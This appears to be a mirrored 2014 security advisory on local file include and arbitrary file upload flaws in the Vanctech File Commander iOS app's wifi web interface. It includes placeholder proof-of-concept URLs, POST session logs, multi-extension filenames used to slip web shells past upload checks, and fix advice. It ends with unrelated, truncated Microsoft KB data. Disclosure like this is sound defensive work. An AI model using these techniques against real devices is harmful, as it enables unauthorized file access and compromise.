Search...

Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities

2014-04-01T00:00:00

ID SECURITYVULNS:DOC:30438
Type securityvulns
Reporter Securityvulns
Modified 2014-04-01T00:00:00

Description

Document Title:

References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1235

Release Date:

2014-03-28

Vulnerability Laboratory ID (VL-ID):

1235

Common Vulnerability Scoring System:

7.3

Product & Service Introduction:

This is an app which can change the way you use your iphone/itouch. With this app , when you try to read a document or listen to music or even you want to watch some video,You don`t have to change the apps round by round.You can deal with them in one app with simple operation. And we can even provide the wifi share, you can share the files whatever you like with you friends or your PC/MAC. And of course you can send the files in your PC/MAC to your iphone/itouch. You can enjoy your files without change pages anywhere anytime you want.

(Copy of the Homepage: https://itunes.apple.com/de/app/file-commander/id484450911 )

Abstract Advisory Information:

The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Vanctech File Commander v1.1 iOS mobile web-application.

Vulnerability Disclosure Timeline:

2014-03-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:

Published

Affected Product(s):

Shanghai Fan Cheng Software Ltd Product: File Commander - iOS Mobile Web Application 1.1

Exploitation Technique:

Remote

Severity Level:

High

Technical Details & Description:

1.1 A local file include web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application. A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the web-application or mobile device.

The web vulnerability is located in the `filename` value of the `upload` module POST methdo request. Remote attackers are able to inject own files with a malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is on the application-side and the request method to inject is POST. The local file/path include execution occcurs in the index file commander dir listing. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.4(+)|(-)7.5.

Exploitation of the local file include web vulnerability requires no user interaction or a privileged mobile web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.

Request Method(s): [+] [POST]

Vulnerable Module(s): [+] Select File > Upload

Vulnerable Parameter(s): [+] filename

Affected Module(s): [+] Index File Dir List (http://localhost:8080/)

1.2 An arbitrary file upload web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `select file` function of the upload resource module. Remote attackers are able to upload a php or js web-shells by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `ptest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file with the path value in the web application. He deletes the .png file extension and can access the application with elevated executable access rights. The attack vector is on the application-side of the vulnerable wifi interface service and the request method is POST. To access the file the attacker needs to request the public `./Download` path.

There are two ways to include local files. The first is to sync with a local user account at the affected device with the vulnerable software. The second possibility is to access the wifi interface and upload (remote) the files in the local or public network. The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2.

Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.

Request Method(s): [+] [POST]

Vulnerable Module(s): [+] Select File > Upload

Vulnerable Parameter(s): [+] filename (multiple extensions)

Affected Module(s): [+] Downloads File Dir (http://localhost:8080/files?x)

Proof of Concept (PoC):

1.1 The local file include web vulnerability can be exploited by local attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.

PoC: http://localhost:8080/files?./[LOCAL FILE INCLUDE VULNERABILITY!] http://localhost:8080/files/[UPLOAD PATH VALUE]/[LOCAL FILE INCLUDE VULNERABILITY!]

--- PoC Session Logs [POST] --- 12:01:20.676[96ms][total 96ms] Status: 302[Found] POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gro?e des Inhalts[67] Mime Type[text/html] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------245932080324620 Content-Disposition: form-data; name="newfile"; filename="2.png" Content-Type: image/png

Source: File Management - Index

        &lt;table style=&quot;background-image: url&#40;&#39;border-1.png&#39;&#41;;&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
            &lt;tbody&gt;&lt;tr&gt;&lt;td height=&quot;1&quot; width=&quot;5&quot;&gt; &lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;td width=&quot;5&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
            &lt;tr&gt;&lt;td&gt; &lt;/td&gt;&lt;td align=&quot;center&quot;&gt;
                &lt;table style=&quot;background-image: url&#40;&#39;bg-1.png&#39;&#41;;&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; width=&quot;100&#37;&quot;&gt;
                    &lt;thead&gt;
                    &lt;tr&gt;&lt;th&gt;Name&lt;/th&gt;&lt;th&gt;Size&lt;/th&gt;&lt;th&gt;Date Modified&lt;/th&gt;&lt;/tr&gt;
                    &lt;/thead&gt;
                    &lt;tbody id=&quot;filelist&quot;&gt;./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!];
                    &lt;/tbody&gt;
                &lt;/table&gt;&lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;/tr&gt;
            &lt;tr&gt;&lt;td height=&quot;1&quot;&gt; &lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;/tr&gt;
        &lt;/tbody&gt;&lt;/table&gt;
        &lt;table style=&quot;border-top:1px solid #ccc;&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; width=&quot;100&#37;&quot;&gt;
                &lt;tbody&gt;&lt;tr&gt;&lt;td height=&quot;20&quot; align=&quot;center&quot;&gt;Powered by Vanctech&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;

PoC: Vulnerable Filoe Item List JScript

    &lt;script type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;
    var now = new Date&#40;&#41;;
    $.getJSON&#40;&quot;/files?&quot;+ now.toString&#40;&#41;,
    function&#40;data&#41;{
      var shadow = false;
      $.each&#40;data, function&#40;i,item&#41;{
        var trclass=&#39;&#39;;
        if &#40;shadow&#41;
          trclass= &quot; class=&#39;shadow&#39;&quot;;
        encodeName = encodeURI&#40;item.name&#41;.replace&#40;&quot;&#39;&quot;, &quot;&#39;&quot;&#41;;
      $&#40;&quot;&lt;tr&quot; + trclass + &quot;&gt;&lt;td&gt;&lt;a href=&#39;/files/&quot; + encodeName + &quot;&#39; class=&#39;file&#39;&gt;&quot; + item.name + &quot;&lt;/a&gt;&lt;/td&gt; &lt;td&gt;&quot; + item.size + &quot;&lt;/td&gt;&lt;td&gt;&quot; + item.modDate + &quot;&lt;/td&gt;&lt;/tr&gt;&quot;&#41;.appendTo&#40;&quot;#filelist&quot;&#41;;
        shadow = !shadow;
      }&#41;;
    }&#41;;
    &lt;/script&gt;

Reference(s): http://localhost:8080/files/

1.2 The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.

PoC: Upload Path (Download) http://localhost:8080/Download/test.jpg.html.php.asp.html.jpg http://localhost:8080/Download/[ARBITRARY FILE UPLOAD VULNERABILITY!]

--- PoC Session Logs [POST] --- 12:02:44.901[543ms][total 543ms] Status: 302[Found] POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gro?e des Inhalts[67] Mime Type[text/html] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------36532693528160 Content-Disposition: form-data; name="newfile"; filename="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]" Content-Type: image/jpeg

Source: File Management - Downloads

        &lt;table style=&quot;background-image: url&#40;&#39;border-1.png&#39;&#41;;&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
            &lt;tbody&gt;&lt;tr&gt;&lt;td height=&quot;1&quot; width=&quot;5&quot;&gt; &lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;td width=&quot;5&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
            &lt;tr&gt;&lt;td&gt; &lt;/td&gt;&lt;td align=&quot;center&quot;&gt;
                &lt;table style=&quot;background-image: url&#40;&#39;bg-1.png&#39;&#41;;&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; width=&quot;100&#37;&quot;&gt;
                    &lt;thead&gt;
                    &lt;tr&gt;&lt;th&gt;Name&lt;/th&gt;&lt;th&gt;Size&lt;/th&gt;&lt;th&gt;Date Modified&lt;/th&gt;&lt;/tr&gt;
                    &lt;/thead&gt;
                    &lt;tbody id=&quot;filelist&quot;&gt;
                    [ARBITRARY FILE UPLOAD VULNERABILITY!]&lt;/tbody&gt;
                &lt;/table&gt;&lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;/tr&gt;
            &lt;tr&gt;&lt;td height=&quot;1&quot;&gt; &lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;/tr&gt;
        &lt;/tbody&gt;&lt;/table&gt;
        &lt;table style=&quot;border-top:1px solid #ccc;&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; width=&quot;100&#37;&quot;&gt;
                &lt;tbody&gt;&lt;tr&gt;&lt;td height=&quot;20&quot; align=&quot;center&quot;&gt;Powered by Vanctech&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;

Reference(s): http://localhost:8080/Download/

Solution - Fix & Patch:

1.1 The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request. Filter and encode also the filename output in the index js item script to prevent injection or code execution attacks in the name context listing.

1.2 Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks. Implement a secure own exception-handling to restrict and disallow files with multiple extensions. Reset the executable rights for html and php codes in the little web-server settings config for /files.

Security Risk:

1.1 The security risk of the local file include web vulnerability in the file commander interface is estimated as high.

1.2 The security risk of the arbitrary file upload web vulnerability in the file commander interface is estimated as high(+).

Credits & Authors:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:

The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

            Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

-- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:30438", "bulletinFamily": "software", "title": "Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities", "description": "\r\n\r\nDocument Title:\r\n===============\r\nVanctech File Commander 1.1 iOS - Multiple Vulnerabilities\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1235\r\n\r\n\r\nRelease Date:\r\n=============\r\n2014-03-28\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1235\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n7.3\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThis is an app which can change the way you use your iphone/itouch. With this app , when you try to read a document or listen to music \r\nor even you want to watch some video,You don`t have to change the apps round by round.You can deal with them in one app with simple operation.\r\nAnd we can even provide the wifi share, you can share the files whatever you like with you friends or your PC/MAC. And of course you can send \r\nthe files in your PC/MAC to your iphone/itouch. You can enjoy your files without change pages anywhere anytime you want.\r\n\r\n(Copy of the Homepage: https://itunes.apple.com/de/app/file-commander/id484450911 )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Vanctech File Commander v1.1 iOS mobile web-application.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2014-03-28:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nShanghai Fan Cheng Software Ltd\r\nProduct: File Commander - iOS Mobile Web Application 1.1\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\n1.1\r\nA local file include web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application.\r\nA file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands \r\nto compromise the web-application or mobile device.\r\n\r\nThe web vulnerability is located in the `filename` value of the `upload` module POST methdo request. Remote attackers are able to inject own \r\nfiles with a malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is on \r\nthe application-side and the request method to inject is POST. The local file/path include execution occcurs in the index file commander \r\ndir listing. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring \r\nsystem) count of 7.4(+)|(-)7.5.\r\n\r\nExploitation of the local file include web vulnerability requires no user interaction or a privileged mobile web-application user account. \r\nSuccessful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.\r\n\r\nRequest Method(s):\r\n\t\t\t\t[+] [POST]\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] Select File > Upload\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] filename\r\n\r\nAffected Module(s):\r\n\t\t\t\t[+] Index File Dir List (http://localhost:8080/)\r\n\r\n\r\n\r\n1.2\r\nAn arbitrary file upload web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application.\r\nThe arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.\r\n\r\nThe vulnerability is located in the `select file` function of the upload resource module. Remote attackers are able to upload a php or js web-shells \r\nby renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following \r\nname and extension `ptest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file with the path value in the web application. \r\nHe deletes the .png file extension and can access the application with elevated executable access rights. The attack vector is on the application-side \r\nof the vulnerable wifi interface service and the request method is POST. To access the file the attacker needs to request the public `./Download` path.\r\n\r\nThere are two ways to include local files. The first is to sync with a local user account at the affected device with the vulnerable software. The second \r\npossibility is to access the wifi interface and upload (remote) the files in the local or public network. The security risk of the arbitrary file upload \r\nweb vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2.\r\n\r\nExploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.\r\nSuccessful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.\r\n\r\nRequest Method(s):\r\n\t\t\t\t[+] [POST]\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] Select File > Upload\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] filename (multiple extensions)\r\n\r\nAffected Module(s):\r\n\t\t\t\t[+] Downloads File Dir (http://localhost:8080/files?x)\r\n\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\n1.1\r\nThe local file include web vulnerability can be exploited by local attackers without privileged web-application user account or user interaction.\r\nFor security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.\r\n\r\nPoC: \r\nhttp://localhost:8080/files?./[LOCAL FILE INCLUDE VULNERABILITY!]\r\nhttp://localhost:8080/files/[UPLOAD PATH VALUE]/[LOCAL FILE INCLUDE VULNERABILITY!]\r\n\r\n--- PoC Session Logs [POST] ---\r\n12:01:20.676[96ms][total 96ms] Status: 302[Found]\r\nPOST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gro?e des Inhalts[67] Mime Type[text/html]\r\n Request Header:\r\n Host[localhost:8080]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://localhost:8080/]\r\n Connection[keep-alive]\r\n POST-Daten:\r\n POST_DATA[-----------------------------245932080324620\r\nContent-Disposition: form-data; name="newfile"; filename="2.png"\r\nContent-Type: image/png\r\n\r\n\r\nSource: File Management - Index\r\n\r\n\t\t\t<table style="background-image: url('border-1.png');" border="0" cellpadding="0" cellspacing="0">\r\n\t\t\t\t<tbody><tr><td height="1" width="5"> </td><td> </td><td width="5"> </td></tr>\r\n\t\t\t\t<tr><td> </td><td align="center">\r\n\t\t\t\t\t<table style="background-image: url('bg-1.png');" border="0" cellpadding="0" cellspacing="0" width="100%">\r\n\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t<tr><th>Name</th><th>Size</th><th>Date Modified</th></tr>\r\n\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t<tbody id="filelist">./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!];\r\n\t\t\t\t\t\t</tbody>\r\n\t\t\t\t\t</table></td><td> </td></tr>\r\n\t\t\t\t<tr><td height="1"> </td><td> </td><td> </td></tr>\r\n\t\t\t</tbody></table>\r\n <table style="border-top:1px solid #ccc;" border="0" cellpadding="0" cellspacing="0" width="100%">\r\n <tbody><tr><td height="20" align="center">Powered by Vanctech</td></tr></tbody></table></div>\r\n\r\n\r\nPoC: Vulnerable Filoe Item List JScript\r\n\r\n\t\t<script type="text/javascript" charset="utf-8">\r\n\t\tvar now = new Date();\r\n\t\t$.getJSON("/files?"+ now.toString(),\r\n\t\tfunction(data){\r\n\t\t var shadow = false;\r\n\t\t $.each(data, function(i,item){\r\n\t\t var trclass='';\r\n\t\t if (shadow)\r\n\t\t trclass= " class='shadow'";\r\n\t\t\tencodeName = encodeURI(item.name).replace("'", "'");\r\n\t\t $("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td> <td>" + item.size + "</td><td>" + item.modDate + "</td></tr>").appendTo("#filelist");\r\n\t\t shadow = !shadow;\r\n\t\t });\r\n\t\t});\r\n\t\t</script>\r\n\r\n\r\n\r\nReference(s):\r\nhttp://localhost:8080/files/\r\n\r\n\r\n\r\n1.2\r\nThe arbitrary file upload web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.\r\nFor security demonstration or to reproduce the local web vulnerability follow the provided information and steps below to continue.\r\n\r\n\r\nPoC: Upload Path (Download)\r\nhttp://localhost:8080/Download/test.jpg.html.php.asp.html.jpg\r\nhttp://localhost:8080/Download/[ARBITRARY FILE UPLOAD VULNERABILITY!]\r\n\r\n\r\n--- PoC Session Logs [POST] ---\r\n12:02:44.901[543ms][total 543ms] Status: 302[Found]\r\nPOST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gro?e des Inhalts[67] Mime Type[text/html]\r\n Request Header:\r\n Host[localhost:8080]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[http://localhost:8080/]\r\n Connection[keep-alive]\r\n POST-Daten:\r\n POST_DATA[-----------------------------36532693528160\r\nContent-Disposition: form-data; name="newfile"; filename="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]"\r\nContent-Type: image/jpeg\r\n\r\n\r\nSource: File Management - Downloads\r\n\r\n\t\t\t<table style="background-image: url('border-1.png');" border="0" cellpadding="0" cellspacing="0">\r\n\t\t\t\t<tbody><tr><td height="1" width="5"> </td><td> </td><td width="5"> </td></tr>\r\n\t\t\t\t<tr><td> </td><td align="center">\r\n\t\t\t\t\t<table style="background-image: url('bg-1.png');" border="0" cellpadding="0" cellspacing="0" width="100%">\r\n\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t<tr><th>Name</th><th>Size</th><th>Date Modified</th></tr>\r\n\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t<tbody id="filelist">\r\n\t\t\t\t\t\t[ARBITRARY FILE UPLOAD VULNERABILITY!]</tbody>\r\n\t\t\t\t\t</table></td><td> </td></tr>\r\n\t\t\t\t<tr><td height="1"> </td><td> </td><td> </td></tr>\r\n\t\t\t</tbody></table>\r\n <table style="border-top:1px solid #ccc;" border="0" cellpadding="0" cellspacing="0" width="100%">\r\n <tbody><tr><td height="20" align="center">Powered by Vanctech</td></tr></tbody></table></div>\r\n\r\n\r\nReference(s):\r\nhttp://localhost:8080/Download/\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\n1.1\r\nThe local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.\r\nFilter and encode also the filename output in the index js item script to prevent injection or code execution attacks in the name context listing.\r\n\r\n1.2\r\nFilter and restrict the file name validation on uploads to prevent arbitrary file upload attacks. Implement a secure own exception-handling to restrict \r\nand disallow files with multiple extensions. Reset the executable rights for html and php codes in the little web-server settings config for /files.\r\n\r\n\r\nSecurity Risk:\r\n==============\r\n1.1\r\nThe security risk of the local file include web vulnerability in the file commander interface is estimated as high.\r\n\r\n1.2\r\nThe security risk of the arbitrary file upload web vulnerability in the file commander interface is estimated as high(+).\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t - admin@evolution-sec.com\r\nSection: www.vulnerability-lab.com/dev \t- forum.vulnerability-db.com \t\t - magazine.vulnerability-db.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2014 | Vulnerability Laboratory [Evolution Security]\r\n\r\n\r\n\r\n-- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com\r\n", "published": "2014-04-01T00:00:00", "modified": "2014-04-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30438", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:51", "edition": 1, "viewCount": 11, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-08-31T11:10:51", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2979597"]}, {"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "zdt", "idList": ["1337DAY-ID-30438"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A715FAD0A825855D84E1660AAE1BFF8B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32659", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:DOC:32655", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:51", "rev": 2}, "vulnersScore": 6.5}, "affectedSoftware": []}

{"mskb": [{"lastseen": "2021-01-01T22:47:23", "bulletinFamily": "microsoft", "cvelist": [], "description": "<html><body><p>Describes SQL Server 2008 R2 Service Pack 3 release information.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This article contains important information to read before you install Microsoft SQL Server 2008 R2 Service Pack 3 (SP3). It describes how to obtain the service pack, the list of fixes included in the service pack, how to select the correct download based on your currently installed version, and a list of copyright attributions for the product.<br/><br/><span class=\"text-base\">Note </span>This article serves as a single source of information for finding all documentation related to this service pack. It includes all the information that you previously used to find in the Release notes and Readme.txt files.<br/><br/> </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">How to obtain SQL Server 2008 R2 SP3</h3>SQL Server 2008 R2 SP3 is available for download at the <a href=\"http://go.microsoft.com/fwlink/?linkid=512818&clcid=0x409\" id=\"kb-link-1\" target=\"_self\">SQL Server 2008 R2 SP3 download page</a>. You can download SQL Server 2008 R2 SP3 Feature Pack <a href=\"http://go.microsoft.com/fwlink/?linkid=512819&clcid=0x409\" id=\"kb-link-2\" target=\"_self\">here</a>.<h3 class=\"sbody-h3\">List of fixes included in SQL Server 2008 R2 SP3</h3>Microsoft SQL Server 2008 R2 service packs are cumulative updates and SQL Server 2008 R2 SP3 upgrades all editions and service levels of SQL Server 2008 R2 to SQL Server 2008 R2 SP3.<br/><br/>This service pack contains fixes from all Cumulative Updates that were released since SP2 for SQL Server 2008 R2. For a full list of fixes from various cumulative updates since SP2, click the following article number to view the article in the Microsoft Knowledge Base. <div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/2730301\" id=\"kb-link-3\">2730301 </a> The SQL Server 2008 R2 builds that were released after SQL Server 2008 R2 Service Pack 2 was released </span></div>In addition to the Cumulative Update fixes, this service pack also includes the following fixes.<br/><br/><br/>\u00a0<div class=\"table-responsive\"><table class=\"table\"><tbody><tr class=\"sbody-tr\"><th class=\"sbody-th\">VSTS Bug</th><th class=\"sbody-th\">KB article number</th><th class=\"sbody-th\">Description</th><th class=\"sbody-th\">Fix area</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">2976923</td><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2994310\" id=\"kb-link-4\">2994310 </a></td><td class=\"sbody-td\">FIX: Distribution Agent for Oracle subscription fails when you use SQL Server 2008 R2 or SQL Server 2008</td><td class=\"sbody-td\">SQL service</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2984340\" id=\"kb-link-5\">2984340 </a></td><td class=\"sbody-td\">MS14-044: Vulnerabilities in SQL Server could allow elevation of privilege: August 